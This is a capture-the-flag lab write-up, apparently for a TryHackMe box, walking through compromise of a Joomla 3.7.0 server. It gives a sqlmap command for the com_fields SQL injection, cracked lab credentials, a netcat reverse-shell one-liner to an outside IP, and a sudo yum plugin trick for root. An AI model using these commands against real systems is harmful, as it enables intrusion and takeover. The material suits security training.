# Enumeration
## NMAP SCAN
```nmap
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open  mysql   MariaDB (unauthorized)

```

## Web
- PHP 5.6.40
- Wappalyzer is reporting the CMS is joomla
- robots.txt contains a lot of entries
```txt
# If the Joomla site is installed within a folder 
# eg www.example.com/joomla/ then the robots.txt file 
# MUST be moved to the site root 
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths. 
# eg the Disallow rule for the /administrator/ folder MUST 
# be changed to read 
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://tool.motoricerca.info/robots-checker.phtml

User-agent: *
Disallow: /administrator/ -> login page
Disallow: /bin/ -> empty
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
```
- Only administrator works.
- We can access a file containing information called `joomla.xml`
`http://10.10.241.45/administrator/manifests/files/joomla.xml`
- Joomla version is 3.7.0

# Exploit 
- The version of Joomla is vulnerable according to Searchsploit
`Joomla! 3.7.0 - 'com_fields' SQL Injection `
- CVE  number is CVE-2017-8917
- The vulnerability is SQL injection and the vulnerable URL is
`index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
`
`You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'' at line 9`
- We can send this to SQLmap to be automated.
```bash
$ sqlmap -u "http://10.10.241.45/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch
```
- SQLmap takes too long and I found this exploit which is faster [github](https://github.com/stefanlucas/Exploit-Joomla/blob/master/joomblah.py)
- We get this output of a users table.
```bash
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
 ```
 - Hash type is bcrypt (fuck),mode 3200.
 - Password cracked is `spiderman123`
 - Possible credential
 `jonah:spiderman123`
 - We can login to `/administrator`
 - We can search [gaining shell from Joomla](https://www.hackingarticles.in/joomla-reverse-shell )
 -  Change one of the files to a webshell and we have remote code execution
 -  Gain a reverse shell.
 `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.1.163 9001 >/tmp/f`
 
 # Privilege Escalation
 - We are user Apache, there is 1 user which is jjameson
 - Found credentials for DB in configuration.php
 ```php
 	public $user = 'root';
	public $password = 'nv5uz9r3ZEDzVjNu';
```
- Test if the password is reused for user jjameson
`jjameson:nv5uz9r3ZEDzVjNu`
- And it is! We are now user jjameson.
-  Check `sudo -l ` for user jjameson
```bash
User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
```
- Check for entry in GTFObins.
- There are two options, we'll be using the second option which is to spawn an interactive root shell.
-   Spawn interactive root shell by loading a custom plugin.
    
    ```bash
    TF=$(mktemp -d)
    cat >$TF/x<<EOF
    [main]
    plugins=1
    pluginpath=$TF
    pluginconfpath=$TF
    EOF
    
    cat >$TF/y.conf<<EOF
    [main]
    enabled=1
    EOF
    
    cat >$TF/y.py<<EOF
    import os
    import yum
    from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
    requires_api_version='2.1'
    def init_hook(conduit):
      os.execl('/bin/sh','/bin/sh')
    EOF
    
    sudo yum -c $TF/x --enableplugin=y
    ```

 
